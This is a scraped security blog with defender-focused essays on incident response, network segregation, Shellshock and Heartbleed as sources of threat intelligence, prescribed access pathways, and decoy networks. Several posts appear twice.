https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
This is an excellent example of how to respond to a software security incident. Having worked at Microsoft for 5 years, I had the amazing experience of watching the Microsoft Security Response Center (MSRC) pioneer and then execute on Incident Response when software vulnerabilities are discovered, either by researchers or by attackers via zero days.
What struck me is not necessarily the analysis conducted about how the bug worked, but in the response procedures that were obviously defined and trained in the organization prior to this happening. Admittedly, I don't know a lot about Cloudflare, so it's possible that they've developed this IR process only after some initial painful failures (that is usually the case for most organizations.) Regardless, it is clear that they moved quickly and efficiently and were able to diagnose the root cause quickly. Of course, it helped that an excellent security researcher like Tavis Ormandy of Google Project Zero provided good initial information.
I was especially struck by their "global kill" flag that ships with features they deploy (excluding the Server Side Exclude feature which predate that kill switch) This allows them to stop catastrophic security breaches. Good foresight. It's unclear at this point what kind of disruption that might cause to operations - but I think given the severity of the bug, this appears to be the right call.
So, to recap
1. Immediate response to responsible disclosure
2. The ability and wherewithal to contain the incident effectively (global kill flag) and the guts to use it.
3. The tenacity and care to start following up on all the loose ends to notify customers and clean up the residual mess
The book is still being written on this one, but based on what we've seen so far, the response by Cloudflare has been very professional.
Logos Information Security
Sunday, February 26, 2017
Saturday, February 14, 2015
Violence of Action
One of the things I've learned as an incident responder over the years is that we defenders have a very short time period in which to react to suspected attacks.
In Mandiant's seminal report on APT1, they reported that these sophisticated attackers had penetrated the target, on average, a year prior to being detected. In one of the investigations they conducted, the attacker had persisted in the network for 4 years and 10 months!
This is interesting. First off, it is really amazing that Mandiant was able to find evidence five years old. This is in contradiction to what I have been taught and what I have experienced. My guess is that it was a stroke of good luck, or that they had a very definitive indicator of compromise (IOC) and were able to get backups going back long enough to establish "patient zero." That is some excellent investigation, and a client that was willing to pay enough to let them dig back far enough.
As pointed out in Mandiant's report -digital evidence is ephemeral. Which means that responding quickly to an event is paramount.
We can increase our chances of conducting a successful investigation if the local security team has done one or more of the following (or managed to get their enterprise to do the following):
However, the point of this post is not about doing a root cause analysis and being able to go "back in time" to identify the initial penetration. The point is about reacting quickly and "violently" to initial indicators that something is wrong in your environment.
This is something I have been thinking about a lot recently. Anyone who does security operations knows that there is a deluge of eventing that must be processed effectively and efficiently by security analysts. Distinguishing signal from noise is THE main issue for security operations.
[Note I am using the term "security operations" versus "incident responders" - in some organizations, these may not be the same people. For the purposes of this blog, security operations pertains to the analysts who are engaged in incident detection]
I don't know that I have any definitive rules for knowing when an event is an incident. But I think this is a topic that we security professionals should start discussing more. And where knowledge transfer should occur. I will be posting more about this topic in the future.
However, here are some final thoughts. In each of the APT intrusions investigated by Mandiant, I bet my bottom dollar that there was some indication that things were amiss. Yes, for some enterprises, they don't even have the detective controls to look at. I wonder, though - in how many cases, did an alert fire and no one looked at it? (The age old question - if a tree falls in the forest...) We know for a fact that this happened in the Target breach.
So - when an alert fires one certainly needs to respond quickly. My contention is that even in instances where suspicious events arise - they should be quickly and fully investigated to the satisfaction of the entire security team. This may seem like an obvious point, but we should be mindful of the quality of our investigations to ensure that what we think we are seeing, is in fact what we are seeing. More on this later (before I get "TL;DR'd")
In Mandiant's seminal report on APT1, they reported that these sophisticated attackers had penetrated the target, on average, a year prior to being detected. In one of the investigations they conducted, the attacker had persisted in the network for 4 years and 10 months!
This is interesting. First off, it is really amazing that Mandiant was able to find evidence five years old. This is in contradiction to what I have been taught and what I have experienced. My guess is that it was a stroke of good luck, or that they had a very definitive indicator of compromise (IOC) and were able to get backups going back long enough to establish "patient zero." That is some excellent investigation, and a client that was willing to pay enough to let them dig back far enough.
As pointed out in Mandiant's report -digital evidence is ephemeral. Which means that responding quickly to an event is paramount.
We can increase our chances of conducting a successful investigation if the local security team has done one or more of the following (or managed to get their enterprise to do the following):
- Enabled verbose logging - everywhere, ideally. But at least on critical infrastructure, servers and other likely targets on the host level and all network devices and security technologies.
- Created secure and centralized logging infrastructure
- Good packet capture or other network surveillance technologies (netflow, etc.)
However, the point of this post is not about doing a root cause analysis and being able to go "back in time" to identify the initial penetration. The point is about reacting quickly and "violently" to initial indicators that something is wrong in your environment.
This is something I have been thinking about a lot recently. Anyone who does security operations knows that there is a deluge of eventing that must be processed effectively and efficiently by security analysts. Distinguishing signal from noise is THE main issue for security operations.
[Note I am using the term "security operations" versus "incident responders" - in some organizations, these may not be the same people. For the purposes of this blog, security operations pertains to the analysts who are engaged in incident detection]
I don't know that I have any definitive rules for knowing when an event is an incident. But I think this is a topic that we security professionals should start discussing more. And where knowledge transfer should occur. I will be posting more about this topic in the future.
However, here are some final thoughts. In each of the APT intrusions investigated by Mandiant, I bet my bottom dollar that there was some indication that things were amiss. Yes, for some enterprises, they don't even have the detective controls to look at. I wonder, though - in how many cases, did an alert fire and no one looked at it? (The age old question - if a tree falls in the forest...) We know for a fact that this happened in the Target breach.
So - when an alert fires one certainly needs to respond quickly. My contention is that even in instances where suspicious events arise - they should be quickly and fully investigated to the satisfaction of the entire security team. This may seem like an obvious point, but we should be mindful of the quality of our investigations to ensure that what we think we are seeing, is in fact what we are seeing. More on this later (before I get "TL;DR'd")
Thursday, January 1, 2015
Horizontal versus Vertical Network Segregation
Originally we considered looking at security from a "ring" perspective. This shouldn't be surprising, given that since the beginning of time, humans have created rings for safety. The moat, the castle, especially on a hill - meant safety
So, we have the same situation in infosec. If we create a perimeter, then ostensibly, we have security.
However, in today's networked world - we have numerous ways in which our perimeter gets distended. AWS instances, mobile devices, federated identity, BYOD - you name it.
Thinking of your network as permeable requires that you construct defenses (preventive controls) WITHIN the network - and segregating the internal network is one of those approaches. I've written about this elsewhere, but utilizing subnets for mission critical infrastructure, sensitive data and other important assets and protecting those "enclaves" is a valid strategy.
This is akin to the "tiering" approach for web applications, where web servers reside in the DMZ and are separated from middleware/business logic layers and data stores. I think of this as "horizontal segregation" where the function of the asset dictates its placement in an enclave. So a data store layer that has your databases in a secure segregated enclave would be a good example.
This is akin to the "tiering" approach for web applications, where web servers reside in the DMZ and are separated from middleware/business logic layers and data stores. I think of this as "horizontal segregation" where the function of the asset dictates its placement in an enclave. So a data store layer that has your databases in a secure segregated enclave would be a good example.
But - how about vertical segregation? If we assume that applications have multi tiers internally - does layer 3/4 segregation mean anything anymore? We all know that firewalls and network layer controls are ineffective against web application attacks. The application allows us to interact with it over port 80/443 and allows us to touch the data store in the "back end".
From my perspective, providing security for hosting/data center solutions - vertical segregation is how we keep multiple tenants from touching each other's data. It also has the effect of isolating a particular service, website, or web application from OTHER services, web
So how do we enable communication between hosts in the back end then? Do we provide a management backplane of connectivity that allows data to flow between endpoints? Or can we force all data transfers out the front door to our edge router, which then sends it to application B's "front end?"
Food for thought?
Food for thought?
Threat intelligence, Part 2
This year has been very interesting in terms of massive, critical vulnerabilities in some of the fundamental technologies and protocols that underpin the Internet, (Heartbleed and Poodle) and in some of the foundational software packages that comprise our computing platforms (Bash - shellshock).
As a practitioner who has had to scramble around to patch these systems, some interesting artifacts have arisen which got me to thinking about threat intelligence. In addition to patching machines, we were aware that some of these vulnerabilities had been around for some time before public disclosure. Even after public disclosure, there was some period of time before patches were available for all the affected platforms that an enterprise would possibly have in their environment.
Which leads me to this: these types of vulnerabilities can potentially serve as a way to identify your adversaries. Think of it - if you have an adversary who wants to get into your network and a vulnerability like heartbleed or shellshock becomes known, don't you think they want to probe you immediately to see if they can use the period in between vulnerability and patch to compromise your systems?
From a vulnerability management perspective, this is why compensating controls are so important. You must protect yourself while you are waiting for that patch.
However, I would make the point that it is extremely important to also log any attempts to take advantage of the vulnerability in as verbose a fashion as possible. If you have the choice of two different compensating controls and one gives you a better view/more intelligence about the attacking party - choose that one (actually, choose both!)
Different types of attacks can provide more detailed intelligence on your attackers
Heartbleed didn't really give us much in the way of telemetry about our attackers, mostly because in the early period after the disclosure, there wasn't a good way of detecting probes. Later, there were some signatures for IDS. At best, you'd get some idea of the IP addresses that were probing you. And as we all know, IP does not provide strong attribution. Using it to identify your adversaries is not a winning strategy.
Shellshock gave us a lot more to go on. Attackers had to craft "attack strings" to take advantage of the vulnerability and these strings appeared in web logs. Reviewing logs could give us some idea of the attackers approach:
Tool repositories
preferred commands
desired targets - both hosts and the files on them.
Now, these are the kinds of Tactics, Techniques, and Procedures that provide better identification of your attackers.
As a practitioner who has had to scramble around to patch these systems, some interesting artifacts have arisen which got me to thinking about threat intelligence. In addition to patching machines, we were aware that some of these vulnerabilities had been around for some time before public disclosure. Even after public disclosure, there was some period of time before patches were available for all the affected platforms that an enterprise would possibly have in their environment.
Which leads me to this: these types of vulnerabilities can potentially serve as a way to identify your adversaries. Think of it - if you have an adversary who wants to get into your network and a vulnerability like heartbleed or shellshock becomes known, don't you think they want to probe you immediately to see if they can use the period in between vulnerability and patch to compromise your systems?
From a vulnerability management perspective, this is why compensating controls are so important. You must protect yourself while you are waiting for that patch.
However, I would make the point that it is extremely important to also log any attempts to take advantage of the vulnerability in as verbose a fashion as possible. If you have the choice of two different compensating controls and one gives you a better view/more intelligence about the attacking party - choose that one (actually, choose both!)
Different types of attacks can provide more detailed intelligence on your attackers
Heartbleed didn't really give us much in the way of telemetry about our attackers, mostly because in the early period after the disclosure, there wasn't a good way of detecting probes. Later, there were some signatures for IDS. At best, you'd get some idea of the IP addresses that were probing you. And as we all know, IP does not provide strong attribution. Using it to identify your adversaries is not a winning strategy.
Shellshock gave us a lot more to go on. Attackers had to craft "attack strings" to take advantage of the vulnerability and these strings appeared in web logs. Reviewing logs could give us some idea of the attackers approach:
Tool repositories
preferred commands
desired targets - both hosts and the files on them.
Now, these are the kinds of Tactics, Techniques, and Procedures that provide better identification of your attackers.
Monday, May 27, 2013
Gnothi Seauton and Prescribed Interactions
"Know thyself" is the inscription over the entry to the Oracle at Delphi.
I think "knowing thyself" from an IT service architecture and IT operations perspective is the primary indicator of whether an enterprise can defend themselves effectively from information security threats. It also is a very good predictor of how quickly they can identify, respond, contain and eventually recover from an infosec incident.
In my work as security consultant, I find that enterprises that do the basics well are far ahead of the game in many respects but especially when it comes to security. By basics, I mean specifically the ITIL disciplines like asset management, change management, and the like. Show me an enterprise with a 100% accurate CMDB (impossible?), I'll show you an enterprise that will suffer less damage in an incident. I'd love to do a study of this particular issue and get some hard data on cost of breach versus ITIL practices. Maybe one of my friends in Academia will contact me?
In fact, I might make the bold statement that how you do ITIL is more important than how many different security technologies you have deployed. If you have an amazing security team, but that team has no idea how many hosts are on the network, how effective do you think their vulnerability management is going to be?
I think this has big implications for Small and Medium size Businesses (SMB). Ostensibly, a smaller company with a less sweeping IT infrastructure should be able to manage their assets much more effectively on a smaller budget. Furthermore, they should be able to "baseline" their normal network behavior more accurately and therefore, be more able to identify anomalies. Oftentimes when I respond to SMB environments, the ones with the more damaging breaches are ones with outsourced IT vendors. The companies with the in-house IT personnel (especially if they're good) tend to identify their incidents themselves. In the former case, they are often finding out from VISA, if you know what I mean...
This may all be pretty obvious up to this point, but I'd like to take this to its logical extreme.
Prescribed Interactions
By "prescribed interactions", I mean pre-defined ways in which systems, users and applications interact with one another on the network. This is similar to the idea of whitelisting, but taken to the next level.
Let me give an example. If a particular enterprise has sensitive data that needs to be accessed by some subset of its users, one can develop a matrix of "prescribed interactions" with that data.
Statement 1: Normal user base can interact with sensitive data ONLY through an Intranet web application.
Statement 2: Administrators can interact with the host ONLY
Statement 3: Database Administrators can interact with the database only. I.e., they can interact with the database directly using database management tools.
Then security controls can be applied to each "access pathway" and the statements can become more granular.
Case 1: All users have browsers that can access the Intranet web page from Subnet X. This necessitates segregating the network so that userland network segments can be readily identified and placed in ACLs on routers and firewalls to control Layer 3 access to the website. Furthermore, there will be authentication to the application. (Let's assume SSO for the enterprise). Last, let's ensure that our application developer and DBA on this app have enabled views and other controls to allow granular access to the data.
Case 2: Administrators will interact with the host by logging into a jumpbox first and then using SSH (or rdp) into the host. Backing up the data is done by...(there are any number of options here, but you get the point - whatever the tool is that does backups, you set up controls that only allow that software, using that service account from that server to conduct backups)
Case 3: DBAs will interact with the data by logging into jump boxes on which SQL Server Management Studio (let's assume a MS environment for the moment) is installed and use Windows authentication only.
Etc. So, what we've done is tried to construct a network environment that allows our different types of users to have access to the information they need, but in a very prescribed way. If they need access remotely, then we have to factor in VPN access to the environment, but recognize that we've made an access pathway that is a little more risky here. Do we want VPN users to be lumped into userland network segments? If they have access to sensitive data, maybe it's now a requirement for two-factor authentication to be used.
Now, what I've just said is nothing new. This is the sort of analysis that most security departments conduct when working with IT to deploy new systems and technologies. What I think I'm advocating is taking it to the next level - a very thorough mapping of all of these interactions in a very conscious way. And that anything other than those prescribed interactions is disallowed and controls are instituted to prevent them for occurring. Policies are applied which explain the use cases and the prescribed interactions (especially for Admins!) Violations are immediately investigated and remediated. The implication here is that your incident detection capability is keyed on finding anomalies to the prescribed interactions. This allows you to identify attacks earlier in the "cyber kill chain."
What I've seen, especially in most SMBs, is a continued adherence to the idea that the network perimeter is a security boundary. It is not. And most infosec professionals will tell you that at this point. We're living in a world where our perimeter should be considered a semi-permeable membrane and we should assume that we've been breached at any given moment in time. But many enterprises are still thinking of the "inside" of their perimeter as trusted and thus not being very conscious of the network traffic and transactions occurring between endpoints on the network.
However, all is not lost. Using prescribed interactions is a lot like the military concept of Intelligence Preparation of the Battlefield (IPB - described here). YOU must prepare the battlefield to give you and advantage over your adversary. And this is where you theoretically have the advantage. Investigations of anomalous behavior is now possible and can be much more effective, if you've done the background work to set up the internal environment and you know what the network transactions should look like for the baseline.
Of course, this can be a daunting task - especially in larger enterprises. However, you can start with the users, transactions and systems that touch sensitive data to make it more manageable.
As my tactics instructor at the FBI used to say, "Where do you want to have a gunfight? At home, at night" - meaning that you are in a place where you know the terrain, you know the angles, the hidden alcoves, the creaky stair on the staircase. Without light, you have an even greater advantage. But that only works if you really know your own home. Sadly, most enterprises do not know their own home very well. So, I've come full circle.
Gnothi Seauton!
I think "knowing thyself" from an IT service architecture and IT operations perspective is the primary indicator of whether an enterprise can defend themselves effectively from information security threats. It also is a very good predictor of how quickly they can identify, respond, contain and eventually recover from an infosec incident.
In my work as security consultant, I find that enterprises that do the basics well are far ahead of the game in many respects but especially when it comes to security. By basics, I mean specifically the ITIL disciplines like asset management, change management, and the like. Show me an enterprise with a 100% accurate CMDB (impossible?), I'll show you an enterprise that will suffer less damage in an incident. I'd love to do a study of this particular issue and get some hard data on cost of breach versus ITIL practices. Maybe one of my friends in Academia will contact me?
In fact, I might make the bold statement that how you do ITIL is more important than how many different security technologies you have deployed. If you have an amazing security team, but that team has no idea how many hosts are on the network, how effective do you think their vulnerability management is going to be?
I think this has big implications for Small and Medium size Businesses (SMB). Ostensibly, a smaller company with a less sweeping IT infrastructure should be able to manage their assets much more effectively on a smaller budget. Furthermore, they should be able to "baseline" their normal network behavior more accurately and therefore, be more able to identify anomalies. Oftentimes when I respond to SMB environments, the ones with the more damaging breaches are ones with outsourced IT vendors. The companies with the in-house IT personnel (especially if they're good) tend to identify their incidents themselves. In the former case, they are often finding out from VISA, if you know what I mean...
This may all be pretty obvious up to this point, but I'd like to take this to its logical extreme.
Prescribed Interactions
By "prescribed interactions", I mean pre-defined ways in which systems, users and applications interact with one another on the network. This is similar to the idea of whitelisting, but taken to the next level.
Let me give an example. If a particular enterprise has sensitive data that needs to be accessed by some subset of its users, one can develop a matrix of "prescribed interactions" with that data.
Statement 1: Normal user base can interact with sensitive data ONLY through an Intranet web application.
Statement 2: Administrators can interact with the host ONLY
Statement 3: Database Administrators can interact with the database only. I.e., they can interact with the database directly using database management tools.
Then security controls can be applied to each "access pathway" and the statements can become more granular.
Case 1: All users have browsers that can access the Intranet web page from Subnet X. This necessitates segregating the network so that userland network segments can be readily identified and placed in ACLs on routers and firewalls to control Layer 3 access to the website. Furthermore, there will be authentication to the application. (Let's assume SSO for the enterprise). Last, let's ensure that our application developer and DBA on this app have enabled views and other controls to allow granular access to the data.
Case 2: Administrators will interact with the host by logging into a jumpbox first and then using SSH (or rdp) into the host. Backing up the data is done by...(there are any number of options here, but you get the point - whatever the tool is that does backups, you set up controls that only allow that software, using that service account from that server to conduct backups)
Case 3: DBAs will interact with the data by logging into jump boxes on which SQL Server Management Studio (let's assume a MS environment for the moment) is installed and use Windows authentication only.
Etc. So, what we've done is tried to construct a network environment that allows our different types of users to have access to the information they need, but in a very prescribed way. If they need access remotely, then we have to factor in VPN access to the environment, but recognize that we've made an access pathway that is a little more risky here. Do we want VPN users to be lumped into userland network segments? If they have access to sensitive data, maybe it's now a requirement for two-factor authentication to be used.
Now, what I've just said is nothing new. This is the sort of analysis that most security departments conduct when working with IT to deploy new systems and technologies. What I think I'm advocating is taking it to the next level - a very thorough mapping of all of these interactions in a very conscious way. And that anything other than those prescribed interactions is disallowed and controls are instituted to prevent them for occurring. Policies are applied which explain the use cases and the prescribed interactions (especially for Admins!) Violations are immediately investigated and remediated. The implication here is that your incident detection capability is keyed on finding anomalies to the prescribed interactions. This allows you to identify attacks earlier in the "cyber kill chain."
What I've seen, especially in most SMBs, is a continued adherence to the idea that the network perimeter is a security boundary. It is not. And most infosec professionals will tell you that at this point. We're living in a world where our perimeter should be considered a semi-permeable membrane and we should assume that we've been breached at any given moment in time. But many enterprises are still thinking of the "inside" of their perimeter as trusted and thus not being very conscious of the network traffic and transactions occurring between endpoints on the network.
However, all is not lost. Using prescribed interactions is a lot like the military concept of Intelligence Preparation of the Battlefield (IPB - described here). YOU must prepare the battlefield to give you and advantage over your adversary. And this is where you theoretically have the advantage. Investigations of anomalous behavior is now possible and can be much more effective, if you've done the background work to set up the internal environment and you know what the network transactions should look like for the baseline.
Of course, this can be a daunting task - especially in larger enterprises. However, you can start with the users, transactions and systems that touch sensitive data to make it more manageable.
As my tactics instructor at the FBI used to say, "Where do you want to have a gunfight? At home, at night" - meaning that you are in a place where you know the terrain, you know the angles, the hidden alcoves, the creaky stair on the staircase. Without light, you have an even greater advantage. But that only works if you really know your own home. Sadly, most enterprises do not know their own home very well. So, I've come full circle.
Gnothi Seauton!
Tuesday, May 21, 2013
Threat Intelligence?
The term threat intelligence reminds me of the age-old joke about Military Intelligence: it's oxymoronic.
Truthfully, I don't think that is the case for either MI or for computer security threat intelligence. I think the term "threat intelligence" is ambiguous, however, and a number of security vendors have jumped into this space. It might be good to tease it out a little bit and try to figure out what it might mean and whether it adds any value when trying to defend your network.
Here's how I think about it. First as a background, I like to use the terms threat actors and threat vectors. The actor (or "agent," in some circles) is the person or organization with the motive, means and desire to attack you. The vector is the exact means by which they accomplish that.
Threat Intelligence in this context can really come from two sources:
1) an analysis of the attack vectors from a review of incident artifacts
2) penetration of threat actor groups to identify their motives, capabilities and imminent targets
For the first source, the threat intelligence is ostensibly valuable because an understanding of historical attack patterns should give an enterprise some understanding of what defenses are most effective. In my practice as a consultant, I find that this can be a good approach. It certainly has benefits in terms of managing a security program, where decisions about where to invest resources are better driven by some true understanding of the threat. One can never be 100% secure and if you can't be strong everywhere, you want to be strong where it counts.
Clearly, this approach is historical and hinges on the theory that past events can be good predictors of future events. This is somewhat true in that the basic model of how intrusions are carried out is still pretty consistent with the pattern as described in the seminal Hacking Exposed books. However, given the dynamism of today's IT landscape (BYOD and Cloud immediately come to mind) - new vectors are arising everyday. Furthermore, it's important to note that this intelligence is primarily sourced from an analysis of data (log, forensic, malware reversing) from attacked systems.
In short, this approach is valuable, but not the whole story. I find the value is mainly in understanding the Tactics, Techniques and Procedures (TTPs) of the various criminal and APT groups, versus getting lists of bad domains, IP addresses and the like. To use the cliched phrase, it's all about actionable intelligence. I don't think those IPs and domains are actionable - by the time you know about them, it's too late in most cases. (That's not to say you shouldn't use security gateways! I'm simply saying as a security professional, you are better served by understanding the approach of the attackers.)
As an example of what I am talking about, I think there is a great paper written by Jon Espenschied at Microsoft, which can be found here. I think threat feeds that emphasize exact details of the new vectors and how they are might be deployed against your enterprise are worth looking into. There's also a very good exploration of this topic in the context of the "Cyber Kill Chain" in a paper written by the folks at Lockheed Martin, found here. I think we can be assured that these fellows have a great deal of experience dealing with APT. I may devote an entire post to that paper and some other related work.
The second approach involves penetrating the circles of likely attackers and trying to determine what they are planning. This is obviously more proactive (vice historical) and has the added advantage of potentially helping you determine if YOUR enterprise is being targeted, before or during the act. An example of this would be when Zeus or SpyEye botnet operators add certain financial instituions to their config files for credential stealing. However, I think the number of times that attacks are caught before they occur is probably small, if for no reason other than that one can attack your enterprise without attacking your infrastructure (in the example given, the bank can't keep its customers from getting Zeus - they can mitigate it a bit but can't stop it entirely.)
Furthermore, I think penetrating these groups is non-trivial. Guys like Brian Krebs have done a good job of getting some penetration of these groups, but one can assume that his credentials as a journalist may be helping. I don't know, but maybe he'll comment on that here on this blog. Brian made available on his site a good reference - the indictment of Bx1, the SpyEye creator/botherder (interesting that they charged wire fraud and not CFAA, but that's for another post.)
I call your attention to paragraph 24 in the "Overt Acts" section of the indictment. It gives one a good understanding of how these criminals come together to plot these schemes.
Another good discussion can be found here at TechRepublic, which then links to an academic paper found here.
On a final note, penetration of criminal groups is one thing - but what about APT? Aside from some of the open source intelligence gathered and presented in Mandiant's APT1 report, one suspects that this is the kind of information only the NSA and CIA could provide. It seems like we've got a long way to go before the USG figures out how to declassify stuff to provide actionable intelligence on these groups without burning their sources.
So which is more valuable? I think one needs to use both, without expecting too much out of either. But, this is a blog, so I don't have to solve the issue. Comments are welcome.
Truthfully, I don't think that is the case for either MI or for computer security threat intelligence. I think the term "threat intelligence" is ambiguous, however, and a number of security vendors have jumped into this space. It might be good to tease it out a little bit and try to figure out what it might mean and whether it adds any value when trying to defend your network.
Here's how I think about it. First as a background, I like to use the terms threat actors and threat vectors. The actor (or "agent," in some circles) is the person or organization with the motive, means and desire to attack you. The vector is the exact means by which they accomplish that.
Threat Intelligence in this context can really come from two sources:
1) an analysis of the attack vectors from a review of incident artifacts
2) penetration of threat actor groups to identify their motives, capabilities and imminent targets
For the first source, the threat intelligence is ostensibly valuable because an understanding of historical attack patterns should give an enterprise some understanding of what defenses are most effective. In my practice as a consultant, I find that this can be a good approach. It certainly has benefits in terms of managing a security program, where decisions about where to invest resources are better driven by some true understanding of the threat. One can never be 100% secure and if you can't be strong everywhere, you want to be strong where it counts.
Clearly, this approach is historical and hinges on the theory that past events can be good predictors of future events. This is somewhat true in that the basic model of how intrusions are carried out is still pretty consistent with the pattern as described in the seminal Hacking Exposed books. However, given the dynamism of today's IT landscape (BYOD and Cloud immediately come to mind) - new vectors are arising everyday. Furthermore, it's important to note that this intelligence is primarily sourced from an analysis of data (log, forensic, malware reversing) from attacked systems.
In short, this approach is valuable, but not the whole story. I find the value is mainly in understanding the Tactics, Techniques and Procedures (TTPs) of the various criminal and APT groups, versus getting lists of bad domains, IP addresses and the like. To use the cliched phrase, it's all about actionable intelligence. I don't think those IPs and domains are actionable - by the time you know about them, it's too late in most cases. (That's not to say you shouldn't use security gateways! I'm simply saying as a security professional, you are better served by understanding the approach of the attackers.)
As an example of what I am talking about, I think there is a great paper written by Jon Espenschied at Microsoft, which can be found here. I think threat feeds that emphasize exact details of the new vectors and how they are might be deployed against your enterprise are worth looking into. There's also a very good exploration of this topic in the context of the "Cyber Kill Chain" in a paper written by the folks at Lockheed Martin, found here. I think we can be assured that these fellows have a great deal of experience dealing with APT. I may devote an entire post to that paper and some other related work.
The second approach involves penetrating the circles of likely attackers and trying to determine what they are planning. This is obviously more proactive (vice historical) and has the added advantage of potentially helping you determine if YOUR enterprise is being targeted, before or during the act. An example of this would be when Zeus or SpyEye botnet operators add certain financial instituions to their config files for credential stealing. However, I think the number of times that attacks are caught before they occur is probably small, if for no reason other than that one can attack your enterprise without attacking your infrastructure (in the example given, the bank can't keep its customers from getting Zeus - they can mitigate it a bit but can't stop it entirely.)
Furthermore, I think penetrating these groups is non-trivial. Guys like Brian Krebs have done a good job of getting some penetration of these groups, but one can assume that his credentials as a journalist may be helping. I don't know, but maybe he'll comment on that here on this blog. Brian made available on his site a good reference - the indictment of Bx1, the SpyEye creator/botherder (interesting that they charged wire fraud and not CFAA, but that's for another post.)
I call your attention to paragraph 24 in the "Overt Acts" section of the indictment. It gives one a good understanding of how these criminals come together to plot these schemes.
Another good discussion can be found here at TechRepublic, which then links to an academic paper found here.
On a final note, penetration of criminal groups is one thing - but what about APT? Aside from some of the open source intelligence gathered and presented in Mandiant's APT1 report, one suspects that this is the kind of information only the NSA and CIA could provide. It seems like we've got a long way to go before the USG figures out how to declassify stuff to provide actionable intelligence on these groups without burning their sources.
So which is more valuable? I think one needs to use both, without expecting too much out of either. But, this is a blog, so I don't have to solve the issue. Comments are welcome.
Tuesday, November 20, 2012
The Right Idea
I read a really good article today, summarizing remarks that Paul Kurtz made at the Cloud Security Alliance Congress in Orlando last week. I couldn't agree more. I am really against the idea of "hack backs" or otherwise taking aggressive actions against hackers. First and foremost, I think you lose that fight every time, unless you are asecurity company filled with elite hacker types who actively monitor and defend your own network. If you are a responsible business enterprise, you have better things to do then get into a war with hackers. This is classic asymmetrical warfare and they only have to be right one time for you to suffer the consequences. Look at the APT threat or even Anonymous to give yourself an idea of what a determined attacker can do with enough time. More importantly, if you have a General Counsel worth a salt, they will crack down on any attempts by the security team to conduct any activities that might land you or anyone from the senior or executive management of the company in a prison in the Ukraine.
Paul's point is well taken. We'd be much better served by creating an environment that contains decoy network segments, servers, and even administrator accounts and booby-trapping those. Previously, these types of operations were prohibitively resource intensive. The advent of virtualization has made it more feasible to create these types of decoy environments without being too much of a financial burden. Of course, it will still take some time to thoughtfully "prepare the battleground" as we used to say in the Marines. However, I could envision a scenario where you take images of all of your "true" assets, remove the valuable IP and replace it with information that is modified enough to make it realistic, but removes your company's "special sauce." You could then use that to populate your decoy environment.
You can see the advantages of this approach from an incident detection standpoint. The "booby-trapping" I referred to above is the creation of a robust monitoring solution that is logging everything going on in those decoy segments. The nice bit is that your correlation logic requirements almost disappear. If anyone touches the bogus "Special Plans" file or the "SECRET_strategicfile.docx" it is an immediate escalation and investigation from the CSIRT. Good, good stuff. At that point, your monitoring then becomes a matter of watching the attacker and documenting their activities. This has incredible value when it comes to attribution as the Tactics, Techniques and Procedures (TTPs) can be very revealing if enough data is collected over a long enough time period.
Paul's point is well taken. We'd be much better served by creating an environment that contains decoy network segments, servers, and even administrator accounts and booby-trapping those. Previously, these types of operations were prohibitively resource intensive. The advent of virtualization has made it more feasible to create these types of decoy environments without being too much of a financial burden. Of course, it will still take some time to thoughtfully "prepare the battleground" as we used to say in the Marines. However, I could envision a scenario where you take images of all of your "true" assets, remove the valuable IP and replace it with information that is modified enough to make it realistic, but removes your company's "special sauce." You could then use that to populate your decoy environment.
You can see the advantages of this approach from an incident detection standpoint. The "booby-trapping" I referred to above is the creation of a robust monitoring solution that is logging everything going on in those decoy segments. The nice bit is that your correlation logic requirements almost disappear. If anyone touches the bogus "Special Plans" file or the "SECRET_strategicfile.docx" it is an immediate escalation and investigation from the CSIRT. Good, good stuff. At that point, your monitoring then becomes a matter of watching the attacker and documenting their activities. This has incredible value when it comes to attribution as the Tactics, Techniques and Procedures (TTPs) can be very revealing if enough data is collected over a long enough time period.
Subscribe to:
Comments (Atom)
